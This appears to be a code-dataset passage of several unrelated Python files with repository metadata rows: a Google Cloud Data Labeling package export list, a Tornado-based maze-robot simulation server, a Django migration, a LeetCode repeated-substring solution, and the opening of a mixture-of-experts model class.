)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
GetExampleRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
GetInstructionRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ImportDataRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
LabelImageRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
LabelTextRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
LabelVideoRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListAnnotatedDatasetsRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListAnnotatedDatasetsResponse,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListAnnotationSpecSetsRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListAnnotationSpecSetsResponse,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListDataItemsRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListDataItemsResponse,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListDatasetsRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListDatasetsResponse,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListEvaluationJobsRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListEvaluationJobsResponse,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListExamplesRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListExamplesResponse,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListInstructionsRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListInstructionsResponse,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
PauseEvaluationJobRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ResumeEvaluationJobRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
SearchEvaluationsRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
SearchEvaluationsResponse,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
SearchExampleComparisonsRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
SearchExampleComparisonsResponse,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
UpdateEvaluationJobRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_payloads import ImagePayload
from google.cloud.datalabeling_v1beta1.types.data_payloads import TextPayload
from google.cloud.datalabeling_v1beta1.types.data_payloads import VideoPayload
from google.cloud.datalabeling_v1beta1.types.data_payloads import VideoThumbnail
from google.cloud.datalabeling_v1beta1.types.dataset import AnnotatedDataset
from google.cloud.datalabeling_v1beta1.types.dataset import AnnotatedDatasetMetadata
from google.cloud.datalabeling_v1beta1.types.dataset import BigQuerySource
from google.cloud.datalabeling_v1beta1.types.dataset import ClassificationMetadata
from google.cloud.datalabeling_v1beta1.types.dataset import DataItem
from google.cloud.datalabeling_v1beta1.types.dataset import Dataset
from google.cloud.datalabeling_v1beta1.types.dataset import Example
from google.cloud.datalabeling_v1beta1.types.dataset import GcsDestination
from google.cloud.datalabeling_v1beta1.types.dataset import GcsFolderDestination
from google.cloud.datalabeling_v1beta1.types.dataset import GcsSource
from google.cloud.datalabeling_v1beta1.types.dataset import InputConfig
from google.cloud.datalabeling_v1beta1.types.dataset import LabelStats
from google.cloud.datalabeling_v1beta1.types.dataset import OutputConfig
from google.cloud.datalabeling_v1beta1.types.dataset import TextMetadata
from google.cloud.datalabeling_v1beta1.types.dataset import DataType
from google.cloud.datalabeling_v1beta1.types.evaluation import (
BoundingBoxEvaluationOptions,
)
from google.cloud.datalabeling_v1beta1.types.evaluation import ClassificationMetrics
from google.cloud.datalabeling_v1beta1.types.evaluation import ConfusionMatrix
from google.cloud.datalabeling_v1beta1.types.evaluation import Evaluation
from google.cloud.datalabeling_v1beta1.types.evaluation import EvaluationConfig
from google.cloud.datalabeling_v1beta1.types.evaluation import EvaluationMetrics
from google.cloud.datalabeling_v1beta1.types.evaluation import ObjectDetectionMetrics
from google.cloud.datalabeling_v1beta1.types.evaluation import PrCurve
from google.cloud.datalabeling_v1beta1.types.evaluation_job import Attempt
from google.cloud.datalabeling_v1beta1.types.evaluation_job import EvaluationJob
from google.cloud.datalabeling_v1beta1.types.evaluation_job import (
EvaluationJobAlertConfig,
)
from google.cloud.datalabeling_v1beta1.types.evaluation_job import EvaluationJobConfig
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import (
BoundingPolyConfig,
)
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import EventConfig
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import (
HumanAnnotationConfig,
)
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import (
ImageClassificationConfig,
)
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import (
ObjectDetectionConfig,
)
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import (
ObjectTrackingConfig,
)
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import (
PolylineConfig,
)
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import (
SegmentationConfig,
)
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import (
SentimentConfig,
)
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import (
TextClassificationConfig,
)
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import (
TextEntityExtractionConfig,
)
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import (
VideoClassificationConfig,
)
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import (
StringAggregationType,
)
from google.cloud.datalabeling_v1beta1.types.instruction import CsvInstruction
from google.cloud.datalabeling_v1beta1.types.instruction import Instruction
from google.cloud.datalabeling_v1beta1.types.instruction import PdfInstruction
from google.cloud.datalabeling_v1beta1.types.operations import CreateInstructionMetadata
from google.cloud.datalabeling_v1beta1.types.operations import (
ExportDataOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
ExportDataOperationResponse,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
ImportDataOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
ImportDataOperationResponse,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
LabelImageBoundingBoxOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
LabelImageBoundingPolyOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
LabelImageClassificationOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
LabelImageOrientedBoundingBoxOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
LabelImagePolylineOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
LabelImageSegmentationOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import LabelOperationMetadata
from google.cloud.datalabeling_v1beta1.types.operations import (
LabelTextClassificationOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
LabelTextEntityExtractionOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
LabelVideoClassificationOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
LabelVideoEventOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
LabelVideoObjectDetectionOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
LabelVideoObjectTrackingOperationMetadata,
)
# Explicit public surface of the package: every client, message type, enum
# and operation-metadata class re-exported from the
# google.cloud.datalabeling_v1beta1 subpackages imported above, so that
# star-imports and static analyzers see exactly this API.
__all__ = (
    "DataLabelingServiceClient",
    "DataLabelingServiceAsyncClient",
    "Annotation",
    "AnnotationMetadata",
    "AnnotationValue",
    "BoundingPoly",
    "ImageBoundingPolyAnnotation",
    "ImageClassificationAnnotation",
    "ImagePolylineAnnotation",
    "ImageSegmentationAnnotation",
    "NormalizedBoundingPoly",
    "NormalizedPolyline",
    "NormalizedVertex",
    "ObjectTrackingFrame",
    "OperatorMetadata",
    "Polyline",
    "SequentialSegment",
    "TextClassificationAnnotation",
    "TextEntityExtractionAnnotation",
    "TimeSegment",
    "Vertex",
    "VideoClassificationAnnotation",
    "VideoEventAnnotation",
    "VideoObjectTrackingAnnotation",
    "AnnotationSentiment",
    "AnnotationSource",
    "AnnotationType",
    "AnnotationSpec",
    "AnnotationSpecSet",
    "CreateAnnotationSpecSetRequest",
    "CreateDatasetRequest",
    "CreateEvaluationJobRequest",
    "CreateInstructionRequest",
    "DeleteAnnotatedDatasetRequest",
    "DeleteAnnotationSpecSetRequest",
    "DeleteDatasetRequest",
    "DeleteEvaluationJobRequest",
    "DeleteInstructionRequest",
    "ExportDataRequest",
    "GetAnnotatedDatasetRequest",
    "GetAnnotationSpecSetRequest",
    "GetDataItemRequest",
    "GetDatasetRequest",
    "GetEvaluationJobRequest",
    "GetEvaluationRequest",
    "GetExampleRequest",
    "GetInstructionRequest",
    "ImportDataRequest",
    "LabelImageRequest",
    "LabelTextRequest",
    "LabelVideoRequest",
    "ListAnnotatedDatasetsRequest",
    "ListAnnotatedDatasetsResponse",
    "ListAnnotationSpecSetsRequest",
    "ListAnnotationSpecSetsResponse",
    "ListDataItemsRequest",
    "ListDataItemsResponse",
    "ListDatasetsRequest",
    "ListDatasetsResponse",
    "ListEvaluationJobsRequest",
    "ListEvaluationJobsResponse",
    "ListExamplesRequest",
    "ListExamplesResponse",
    "ListInstructionsRequest",
    "ListInstructionsResponse",
    "PauseEvaluationJobRequest",
    "ResumeEvaluationJobRequest",
    "SearchEvaluationsRequest",
    "SearchEvaluationsResponse",
    "SearchExampleComparisonsRequest",
    "SearchExampleComparisonsResponse",
    "UpdateEvaluationJobRequest",
    "ImagePayload",
    "TextPayload",
    "VideoPayload",
    "VideoThumbnail",
    "AnnotatedDataset",
    "AnnotatedDatasetMetadata",
    "BigQuerySource",
    "ClassificationMetadata",
    "DataItem",
    "Dataset",
    "Example",
    "GcsDestination",
    "GcsFolderDestination",
    "GcsSource",
    "InputConfig",
    "LabelStats",
    "OutputConfig",
    "TextMetadata",
    "DataType",
    "BoundingBoxEvaluationOptions",
    "ClassificationMetrics",
    "ConfusionMatrix",
    "Evaluation",
    "EvaluationConfig",
    "EvaluationMetrics",
    "ObjectDetectionMetrics",
    "PrCurve",
    "Attempt",
    "EvaluationJob",
    "EvaluationJobAlertConfig",
    "EvaluationJobConfig",
    "BoundingPolyConfig",
    "EventConfig",
    "HumanAnnotationConfig",
    "ImageClassificationConfig",
    "ObjectDetectionConfig",
    "ObjectTrackingConfig",
    "PolylineConfig",
    "SegmentationConfig",
    "SentimentConfig",
    "TextClassificationConfig",
    "TextEntityExtractionConfig",
    "VideoClassificationConfig",
    "StringAggregationType",
    "CsvInstruction",
    "Instruction",
    "PdfInstruction",
    "CreateInstructionMetadata",
    "ExportDataOperationMetadata",
    "ExportDataOperationResponse",
    "ImportDataOperationMetadata",
    "ImportDataOperationResponse",
    "LabelImageBoundingBoxOperationMetadata",
    "LabelImageBoundingPolyOperationMetadata",
    "LabelImageClassificationOperationMetadata",
    "LabelImageOrientedBoundingBoxOperationMetadata",
    "LabelImagePolylineOperationMetadata",
    "LabelImageSegmentationOperationMetadata",
    "LabelOperationMetadata",
    "LabelTextClassificationOperationMetadata",
    "LabelTextEntityExtractionOperationMetadata",
    "LabelVideoClassificationOperationMetadata",
    "LabelVideoEventOperationMetadata",
    "LabelVideoObjectDetectionOperationMetadata",
    "LabelVideoObjectTrackingOperationMetadata",
)
| [
"noreply@github.com"
] | noreply@github.com |
ed55f6dab42ca051e34f6202d470ba130d589aa2 | b0295c52e9b088e24c35b7d1866c31364e32ad6e | /server_sim.py | 48da7397af9c526d59b7016c008eb085576cb813 | [] | no_license | Jeremy-CH-cmyk/CZ3004 | ec1851bbb75fff1f8fb2a8227cde11bc7abd0976 | d7018f4ef22987c25d8a0dbfb34655134860e438 | refs/heads/master | 2023-06-19T11:01:58.925619 | 2021-07-04T10:58:06 | 2021-07-04T10:58:06 | 382,631,519 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,954 | py | #!/usr/bin/env python
"""Tornado server to run the simulation experiments
Attributes:
app (tornado.web.Application): Address mappings
clients (dict): Dictionary of active clients
settings (dict): Settings for the web-server
"""
import json
import numpy as np
import os
import time
import tornado.web as web
import tornado.websocket as websocket
import tornado.ioloop as ioloop
import threading
from tornado.options import define, options
from Algo.Exploration import Exploration
from Algo.FastestPath import FastestPath
from Algo.Constants import START, GOAL, NORTH
define("port", default=8888, help="run on the given port", type=int)
clients = dict()
currentMap = np.zeros([20, 15])
map_name = 'map.txt'
area = 0
step = 0.1
class FuncThread(threading.Thread):
    """Thread that runs an arbitrary function with positional arguments.

    The callable and its arguments are stored under names that do not
    collide with threading.Thread's own attributes: on Python 3,
    ``Thread.__init__`` resets ``self._target``/``self._args``, so the
    original pattern of assigning them *before* calling the base
    initializer silently discarded the function to run.
    """
    def __init__(self, target, *args):
        """Initialize the thread.
        Args:
            target (function): Function to be run on the new thread
            *args: arguments to be passed to the function
        """
        # Initialize the base Thread first, then record the work to do.
        threading.Thread.__init__(self)
        self._func = target
        self._func_args = args
    def run(self):
        """Overrides run to invoke the stored function with its arguments.
        """
        self._func(*self._func_args)
class IndexHandler(web.RequestHandler):
    """To display the front-end interface
    """
    # Legacy Tornado (<6.0) decorator: keeps the connection open until
    # finish() is called; render() below completes the request itself.
    @web.asynchronous
    def get(self):
        self.render("index.html")
class WebSocketHandler(websocket.WebSocketHandler):
    """Handles web-socket requests from the front-end to receive/send messages
    Attributes:
        id (string): id string from GET request
    """
    def open(self):
        """Open a web socket for communication
        """
        self.id = self.get_argument("Id")
        # Disable Nagle's algorithm so map updates are pushed immediately.
        self.stream.set_nodelay(True)
        # Register this connection in the module-level client registry so
        # update()/logger() can broadcast to it.
        clients[self.id] = {"id": self.id, "object": self}
        print("WebSocket opened")
    def on_message(self, message):
        """Displays any message received
        Args:
            message (string): Message received from front-end
        """
        print("Client " + str(self.id) + " received a message : " + str(message))
    def on_close(self):
        """Run when the web socket is closed
        """
        print("WebSocket closed")
        # De-register so broadcasts stop targeting a dead connection.
        if self.id in clients:
            del clients[self.id]
class StartHandler(web.RequestHandler):
    """Handles the start of exploration for the maze
    """
    @web.asynchronous
    def get(self):
        """Read step/limit/coverage query params and kick off exploration."""
        self.write("Starting...")
        self.step = self.get_argument("step")
        self.limit = self.get_argument("limit")
        self.coverage = self.get_argument("coverage")
        # Publish the per-move delay as the module-level simulation speed.
        global step
        step = float(self.step)
        startExploration(self.limit, self.coverage)
        self.flush()
class ResetHandler(web.RequestHandler):
    """Handles the reset of the current map
    """
    @web.asynchronous
    def get(self):
        """Recreate the Exploration instance and push a blank map to the UI."""
        self.write("Reset...")
        global exp
        exp = Exploration(map_name, 5)
        # Consistency fix: use the function form of print, as every other
        # print in this module does (identical output on Python 2 for a
        # single argument).
        print(exp.currentMap)
        update(np.zeros([20, 15]), exp.exploredArea, exp.robot.center, exp.robot.head,
               START, GOAL, 0)
class FSPHandler(web.RequestHandler):
    """Handles the start of fastest path for the maze
    """
    @web.asynchronous
    def get(self):
        """Read the waypoint (x, y) from the query string and start the run."""
        self.x = self.get_argument("x")
        self.y = self.get_argument("y")
        self.write("Starting...")
        # Coordinates are passed on as strings; startFastestPath converts them.
        startFastestPath([self.x, self.y])
        self.flush()
class LoadMapHandler(web.RequestHandler):
    """Handles switching the map file used by the simulator
    """
    @web.asynchronous
    def get(self):
        # Point the module-level map_name at the requested file; it takes
        # effect the next time an Exploration instance is constructed.
        global map_name
        self.name = self.get_argument("name")
        map_name = self.name
def startExploration(limit, coverage):
    """To start the exploration of the maze
    Spawns the exploration loop on a worker thread so the Tornado IO loop
    stays responsive while the simulation runs.
    Args:
        limit (str): time budget formatted as "H:M:S"
        coverage (str): target explored-area percentage to stop at
    """
    global exp, t_s
    exp = Exploration(map_name, 5)
    t_s = time.time()
    t2 = FuncThread(exploration, exp, limit, coverage)
    t2.start()
    # t2.join()
def exploration(exp, limit, coverage):
    """To explore the map and update the front-end after each move
    Args:
        exp (Exploration): New instance of the exploration class
        limit (str): time budget formatted as "H:M:S"
        coverage (str): target explored-area percentage to stop at
    """
    global currentMap, area
    # Parse "H:M:S" into a total number of seconds.
    # NOTE(review): indexing the result of map() relies on Python 2 list
    # semantics (the statement print at ResetHandler confirms this is Py2).
    limit = map(int, str(limit).strip().split(':'))
    time_limit = limit[0]*60*60 + limit[1]*60 + limit[2]
    elapsedTime = 0
    update(exp.currentMap, exp.exploredArea, exp.robot.center, exp.robot.head, START, GOAL, 0)
    logger('Exploration Started !')
    current = exp.moveStep()
    currentMap = exp.currentMap
    area = exp.exploredArea
    # visited counts how often each cell has been the robot's centre; used to
    # detect the robot looping in place.
    visited = dict()
    steps = 0
    numCycle = 1
    # Main loop: step until exploration reports completion (current[1]), the
    # time budget is exhausted, or the coverage target is reached.
    while (not current[1] and elapsedTime <= time_limit and exp.exploredArea < int(coverage)):
        elapsedTime = round(time.time()-t_s, 2)
        update(exp.currentMap, exp.exploredArea, exp.robot.center, exp.robot.head, START, GOAL,
               elapsedTime)
        current = exp.moveStep()
        currentMap = exp.currentMap
        area = exp.exploredArea
        steps += 1
        currentPos = tuple(exp.robot.center)
        if (currentPos in visited):
            visited[currentPos] += 1
            # Visited the same cell more than 3 times: assume the robot is
            # stuck in a loop and hop to an explored neighbour of unexplored
            # space via the fastest path, then resume exploring from there.
            if (visited[currentPos] > 3):
                neighbour = exp.getExploredNeighbour()
                if (neighbour):
                    neighbour = np.asarray(neighbour)
                    fsp = FastestPath(currentMap, exp.robot.center, neighbour,
                                      exp.robot.direction, None)
                    fastestPath(fsp, neighbour, exp.exploredArea, None)
                    exp.robot.center = neighbour
                    exp.robot.head = fsp.robot.head
                    exp.robot.direction = fsp.robot.direction
                else:
                    break
        else:
            visited[currentPos] = 1
        # Back at START with the map still incomplete: jump out to a frontier
        # cell instead of starting another full lap from the start zone.
        if (np.array_equal(exp.robot.center, START)):
            numCycle += 1
            if (numCycle > 1 and steps > 4 and exp.exploredArea < 100):
                neighbour = exp.getExploredNeighbour()
                if (neighbour):
                    neighbour = np.asarray(neighbour)
                    fsp = FastestPath(currentMap, exp.robot.center, neighbour,
                                      exp.robot.direction, None)
                    fastestPath(fsp, neighbour, exp.exploredArea, None)
                    exp.robot.center = neighbour
                    exp.robot.head = fsp.robot.head
                    exp.robot.direction = fsp.robot.direction
                    exp.robot.getSensors()
                else:
                    break
        # Throttle the simulation so the front-end animation stays visible.
        time.sleep(float(step))
    update(exp.currentMap, exp.exploredArea, exp.robot.center, exp.robot.head, START, GOAL,
           elapsedTime)
    logger('Exploration Done !')
    logger("Map Descriptor 1 --> "+str(exp.robot.descriptor_1()))
    logger("Map Descriptor 2 --> "+str(exp.robot.descriptor_2()))
    # Finally, race back to START along the fastest path.
    fsp = FastestPath(currentMap, exp.robot.center, START, exp.robot.direction, None)
    logger('Fastest Path Started !')
    fastestPath(fsp, START, exp.exploredArea, None)
def startFastestPath(waypoint):
    """To start the fastest path of the maze
    Args:
        waypoint (list): [x, y] strings from the HTTP request; converted to
            ints before being handed to the planner.
    """
    global fsp
    global t_s
    # NOTE(review): the converted waypoint is reused below, which relies on
    # Python 2 map() returning a list (a Py3 iterator would be exhausted).
    waypoint = map(int, waypoint)
    fsp = FastestPath(currentMap, START, GOAL, NORTH, waypoint)
    t_s = time.time()
    logger('Fastest Path Started !')
    # Run on a worker thread so the IO loop keeps serving websocket updates.
    t3 = FuncThread(fastestPath, fsp, GOAL, area, waypoint)
    t3.start()
    # t3.join() this causes the thread to close after exploration and websocket closes
def markMap(curMap, waypoint):
    """Mark the waypoint cell on the map grid with the value 7.

    Returns the same array object; no-op when waypoint is falsy
    (None or an empty list).
    """
    if not waypoint:
        return curMap
    curMap[tuple(waypoint)] = 7
    return curMap
def fastestPath(fsp, goal, area, waypoint):
    """Step the robot along a pre-computed fastest path until it reaches goal,
    pushing each move (and the elapsed time) to the front-end.
    Args:
        fsp (FastestPath): pre-built fastest-path planner
        goal (Numpy array): target cell the robot must reach
        area (float): explored-area percentage shown in the UI
        waypoint (list): optional cell highlighted on the map (may be None)
    """
    fsp.getFastestPath()
    logger(json.dumps(fsp.path))
    while (fsp.robot.center.tolist() != goal.tolist()):
        fsp.moveStep()
        elapsedTime = round(time.time()-t_s, 2)
        # Draw on a copy so the waypoint marker never pollutes the real map.
        update(markMap(np.copy(fsp.exploredMap), waypoint), area, fsp.robot.center, fsp.robot.head,
               START, GOAL, elapsedTime)
        time.sleep(step)
    logger('Fastest Path Done !')
def update(current_map, exploredArea, center, head, start, goal, elapsedTime):
    """To send messages to update the front-end
    Args:
        current_map (Numpy array): Current state of the exploration map
        exploredArea (int): Number of cells that have been explored
        center (list): Location of center of the robot
        head (list): Location of head of the robot
        start (list): Location of the starting point for the robot
        goal (list): Location of the finishing point for the robot
        elapsedTime (float): The time that has elapsed since exploration started
    """
    # Broadcast the full UI state to every connected websocket client.
    for key in clients:
        message = dict()
        message['area'] = '%.2f' % (exploredArea)
        # Work on a copy; the 3x3 start/goal zones get colour codes 3 and 4.
        tempMap = current_map.copy()
        tempMap[start[0]-1: start[0]+2, start[1]-1: start[1]+2] = 3
        tempMap[goal[0]-1: goal[0]+2, goal[1]-1: goal[1]+2] = 4
        # Numpy arrays are not JSON-serializable; convert to plain int lists.
        message['map'] = json.dumps(tempMap.astype(int).tolist())
        message['center'] = json.dumps(center.astype(int).tolist())
        message['head'] = json.dumps(head.astype(int).tolist())
        message['time'] = '%.2f' % (elapsedTime)
        clients[key]['object'].write_message(json.dumps(message))
def logger(message):
    """Broadcast a log line to every connected front-end client."""
    payload = json.dumps({'log': message})
    for entry in clients.values():
        entry['object'].write_message(payload)
# Tornado application settings: templates live under GUI/templates.
settings = dict(
    template_path=os.path.join(os.path.dirname(__file__), "GUI", "templates"),
    debug=True
)
# URL routing; the catch-all entry serves static assets from the GUI folder.
app = web.Application([
    (r'/', IndexHandler),
    (r'/websocket', WebSocketHandler),
    (r'/start', StartHandler),
    (r'/reset', ResetHandler),
    (r'/fsp', FSPHandler),
    (r'/lm', LoadMapHandler),
    (r'/(.*)', web.StaticFileHandler, {'path': os.path.join(os.path.dirname(__file__), "GUI")})
], **settings)
if __name__ == '__main__':
    app.listen(options.port)
    # Run the Tornado IO loop on a worker thread (see FuncThread above).
    t1 = FuncThread(ioloop.IOLoop.instance().start)
    t1.start()
    t1.join()
| [
"zyj82073693@gmail.com"
] | zyj82073693@gmail.com |
e1b6cbccee50c959c6cedbd313d04a47b3d26b07 | 4fcc1a1261f585f955337da5f1ccd00568735093 | /8variableassignments2Assignandprint.py | 45422c40f839dfff2cfb80e4ec2c8d6856c5d1dd | [] | no_license | akilakilakil/pythonprograms | cd8b2859d7a170263befe89875d3aad2a1675d73 | 23167f5d6c63a6e4cd9d06e156a9202bfb5a9623 | refs/heads/master | 2021-05-05T21:20:24.125374 | 2017-12-27T18:34:24 | 2017-12-27T18:34:24 | 115,519,501 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 113 | py | greeting="hello world"
first="narendra"
last="modi"
print(greeting)
print()
print(first+" "+last+" "+"won!") | [
"noreply@github.com"
] | noreply@github.com |
2abcd63ea8fc6f13067f74ec6bed69e75c9af4f6 | de5a90737ce5a515b220e95b1b992e29ecb9c481 | /main/migrations/0004_auto_20210513_1155.py | 1a4ed658644ffc2c3e43a9497ff39f5aa5cb8253 | [] | no_license | web-prof/mcc | 39d8dc2101e070b7cff871b349ee07761fc96ab1 | b48342dfeccbf88245d47f1b098b30a4dd1f4e84 | refs/heads/main | 2023-06-14T07:18:03.016423 | 2021-07-10T05:59:51 | 2021-07-10T05:59:51 | 383,214,656 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 568 | py | # Generated by Django 3.2 on 2021-05-13 09:55
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema migration: adds created/updated timestamp
    # bookkeeping columns to the Profile model. Do not edit by hand.
    dependencies = [
        ('main', '0003_auto_20210506_2251'),
    ]
    operations = [
        migrations.AddField(
            model_name='profile',
            name='created',
            field=models.DateTimeField(auto_now_add=True, null=True),
        ),
        migrations.AddField(
            model_name='profile',
            name='updated',
            field=models.DateTimeField(auto_now=True, null=True),
        ),
    ]
| [
"ishakg29@gmail.com"
] | ishakg29@gmail.com |
876fc1a78537224343052e98af0c117e88b960b7 | 5fd6c20e54ad4bb804dda3925b5dbd22e1b78cfd | /excersise/leetcode/459_重复的子字符串.py | 6d5521e6fc009c12a2297e88af8b8300210eda46 | [] | no_license | alanlyang/learning | 6d748134bbc8786018e0d75a499aed44cec1d9c7 | dfacd79e4d5bf74db08cb95e4dd5f19df1e32393 | refs/heads/master | 2023-01-06T05:29:22.134224 | 2020-11-03T09:54:23 | 2020-11-03T09:54:23 | 287,918,906 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,394 | py | ######################
# Given a non-empty string, determine whether it can be constructed by taking
# a substring of it and appending multiple copies of that substring together.
# The string consists of lowercase English letters only and its length does
# not exceed 10000.
# 2020-08-24
########################
class Solution:
    """Three solutions to LeetCode 459, "Repeated Substring Pattern"."""

    def repeatedSubStringPattern1(self, s: str) -> bool:
        """Return True if ``s`` can be built by repeating one of its substrings.

        Brute force: a candidate period ``i`` must divide len(s), the
        repeating unit must be a prefix of ``s``, and every character must
        satisfy s[j] == s[j - i].

        Complexity: O(n^2) time (O(n) candidate lengths, O(n) scan each),
        O(1) extra space.
        """
        n = len(s)
        for i in range(1, n // 2 + 1):
            # Only divisors of n can be the length of a repeating unit.
            if n % i == 0:
                if all(s[j] == s[j - i] for j in range(i, n)):
                    return True
        return False

    def answer2(self, s: str) -> bool:
        """String-matching trick: if ``s`` has a repeating period, then ``s``
        occurs inside ``s + s`` at some index strictly between 0 and len(s).
        find(s, 1) returns len(s) exactly when no such earlier match exists.
        """
        return (s + s).find(s, 1) != len(s)

    def answer3(self, s: str) -> bool:
        """KMP-based variant: search for ``s`` inside ``s + s`` while skipping
        the trivial alignments at offsets 0 and len(s).
        """
        def kmp(query, pattern):
            n, m = len(query), len(pattern)
            # fail[i]: index of the last character of the longest proper
            # prefix of pattern[:i+1] that is also a suffix (-1 if none).
            fail = [-1] * m
            for i in range(1, m):
                j = fail[i - 1]
                while j != -1 and pattern[j + 1] != pattern[i]:
                    j = fail[j]
                if pattern[j + 1] == pattern[i]:
                    fail[i] = j + 1
            match = -1
            # Scan from index 1 to n-2 so the trivial occurrences of the
            # pattern at offsets 0 and len(pattern) are never reported.
            for i in range(1, n - 1):
                while match != -1 and pattern[match + 1] != query[i]:
                    match = fail[match]
                if pattern[match + 1] == query[i]:
                    match += 1
                if match == m - 1:
                    return True
            return False

        return kmp(s + s, s)
if __name__ == "__main__":
    # Quick manual check: "abab" == "ab" * 2, so this should print True.
    soul = Solution()
    print(soul.answer3("abab"))
"""
kmp算法:(一种用于字符串查找的算法)
kmp算法核心:部分匹配表(Partial Match Table)
PMT中的value是字符串前缀集合与后缀集合的交集中最长元素的长度
next数组为模式串自匹配上的长度
""" | [
"alanyang414@gmail.com"
] | alanyang414@gmail.com |
4acc7b718d2d2caf62de1f3026264d39249cbaf5 | fdeb384c89ed7bab969dbddf409005b1a50fc577 | /mogpe/mixture_of_experts/base.py | 902f32f459b88787362ff04fa95c5bc84337bd35 | [
"Apache-2.0"
] | permissive | Mr-G1998/mogpe | 6e2df773b64c57f3336d949361663e51078734a6 | 220d708899dd5db3d5860228cc7f68c4009e82eb | refs/heads/master | 2023-03-10T17:15:11.351225 | 2021-01-21T14:36:30 | 2021-01-21T14:36:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,730 | py | #!/usr/bin/env python3
from abc import ABC, abstractmethod
from typing import Optional, Tuple
import gpflow as gpf
import tensorflow as tf
import tensorflow_probability as tfp
from gpflow import default_float
from gpflow.models import BayesianModel, ExternalDataTrainingLossMixin
from gpflow.models.training_mixins import InputData, RegressionData
from mogpe.experts import ExpertsBase
from mogpe.gating_networks import GatingNetworkBase
tfd = tfp.distributions
class MixtureOfExperts(BayesianModel, ABC):
    """Abstract base class for mixture of experts models.

    Given an input :math:`x` and an output :math:`y` the mixture of experts
    marginal likelihood is given by,

    .. math::
        p(y|x) = \sum_{k=1}^K \Pr(\\alpha=k | x) p(y | \\alpha=k, x)

    Assuming the expert indicator variable :math:`\\alpha \in \{1, ...,K\}`
    the mixing probabilities are given by :math:`\Pr(\\alpha=k | x)` and are
    collectively referred to as the gating network.
    The experts are given by :math:`p(y | \\alpha=k, x)` and are responsible
    for predicting in different regions of the input space.

    Each subclass that inherits MixtureOfExperts should implement the
    maximum_log_likelihood_objective(data) method. It is used as the objective
    function to optimise the models trainable parameters.

    :param gating_network: an instance of the GatingNetworkBase class with
        the predict_mixing_probs(Xnew) method implemented.
    :param experts: an instance of the ExpertsBase class with the
        predict_dists(Xnew) method implemented.
    """

    def __init__(
        self, gating_network: GatingNetworkBase, experts: ExpertsBase
    ):
        """
        :param gating_network: an instance of the GatingNetworkBase class with
            the predict_mixing_probs(Xnew) method implemented.
        :param experts: an instance of the ExpertsBase class with the
            predict_dists(Xnew) method implemented.
        """
        assert isinstance(gating_network, GatingNetworkBase)
        self.gating_network = gating_network
        assert isinstance(experts, ExpertsBase)
        self.experts = experts
        self.num_experts = experts.num_experts

    def predict_mixing_probs(self, Xnew: InputData, **kwargs):
        """Calculates the mixing probabilities at Xnew.

        :param Xnew: inputs with shape [num_test, input_dim]
